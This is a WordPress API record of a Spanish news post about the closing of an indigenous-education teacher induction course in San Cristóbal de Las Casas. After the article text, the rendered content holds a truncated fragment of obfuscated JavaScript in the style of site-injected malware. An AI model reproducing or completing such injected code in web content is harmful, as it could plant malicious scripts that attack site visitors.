{"id":2210,"date":"2022-05-18T00:31:45","date_gmt":"2022-05-18T00:31:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2210"},"modified":"2022-05-18T00:31:47","modified_gmt":"2022-05-18T00:31:47","slug":"termina-el-curso-de-los-aspirantes-del-sistema-de-educacion-indigena","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2210","title":{"rendered":"Termina el curso  de los aspirantes del Sistema de Educaci\u00f3n Ind\u00edgena"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"2211\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.16-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-2211\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.16-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.16-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.16-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.16-PM-1536x1153.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.16-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"2212\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.11-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-2212\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.11-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.11-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.11-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.11-PM-1536x1153.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-05-17-at-2.58.11-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>17 de Mayo del 2022. San Crist\u00f3bal de Las Casas. &#8211; La Universidad Intercultural de Chiapas (Unich) fue sede del curso de \u201cInducci\u00f3n a la docencia del medio ind\u00edgena\u201d y \u201cAspectos de la Preparaci\u00f3n Profesional para Ingreso a Educaci\u00f3n B\u00e1sica Dirigido a Profesores Biling\u00fces de Educaci\u00f3n Preescolar y Primaria Ind\u00edgena 2022\u201d, donde participaron 219 aspirantes de todo el estado de Chiapas. Durante su intervenci\u00f3n, Roberto S\u00e1ntiz G\u00f3mez, jefe del Departamento para el Fortalecimiento de las Lenguas Ind\u00edgenas de la Secretar\u00eda de Educaci\u00f3n del estado, destac\u00f3 que el perfil del maestro ind\u00edgena de interactuar con la comunidad, dar participaci\u00f3n a los padres de familia, tener la capacidad de conocimientos legales y la sabidur\u00eda de la misma comunidad. \u201cNecesitamos que los ni\u00f1os que egresen de la primaria sepan dominar las competencias ling\u00fc\u00edsticas, que sepa hablar, escribir, o\u00edr, leer en su propia lengua materna, y que sepa hablar el espa\u00f1ol bien, escribir, escuchar, leer, que domine las habilidades ling\u00fc\u00edsticas de dos o m\u00e1s lenguas, y as\u00ed tendr\u00e1n todas las herramientas de enfrentar la vida, y de eso deben ser conscientes ustedes que van a ser los nuevos maestros\u201d. Asimismo, record\u00f3 que hace 32 a\u00f1os se encontraba tambi\u00e9n en la clausura del curso de inducci\u00f3n a la docencia para el medio ind\u00edgena, \u201cfue en 1990, cuando estuve en una de las Regiones m\u00e1s pobres de Oaxaca; con todo lo que aprendimos en 6 meses ofrec\u00ed mi servicio de docente en Educaci\u00f3n Ind\u00edgena\u201d. \u201cHan estado durante 10 sesiones virtuales, 10 presenciales, siendo acompa\u00f1ados por maestros de educaci\u00f3n ind\u00edgena, espero hayan aprovechado, el tiempo es corto, si ustedes supieron aprovechar el acompa\u00f1amiento de cada uno de los asesores ser\u00e1 de provecho, pusimos no s\u00f3lo hablantes de una lengua sino expertos en su estudio, porque para dar clases y ense\u00f1ar en un idioma, no basta hablar la lengua, hay que estudiar a profundidad\u201d, agreg\u00f3. Finalmente, dijo que es importante fomentar la ense\u00f1anza en lengua materna y para ello se requiere un nuevo perfil del maestro de educaci\u00f3n ind\u00edgena, donde no nos avergoncemos y fomentemos nuestra identidad y lengua.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 17 de Mayo del 2022. San Crist\u00f3bal de Las Casas. &#8211; La Universidad Intercultural de Chiapas (Unich) fue sede del curso de \u201cInducci\u00f3n a la docencia del medio ind\u00edgena\u201d y \u201cAspectos de la Preparaci\u00f3n Profesional para Ingreso a Educaci\u00f3n B\u00e1sica Dirigido a Profesores Biling\u00fces de Educaci\u00f3n Preescolar y Primaria Ind\u00edgena 2022\u201d, donde participaron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2213,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,17],"tags":[],"class_list":["post-2210","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas","category-portada"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2210"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2210\/revisions"}],"predecessor-version":[{"id":2214,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2210\/revisions\/2214"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2213"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}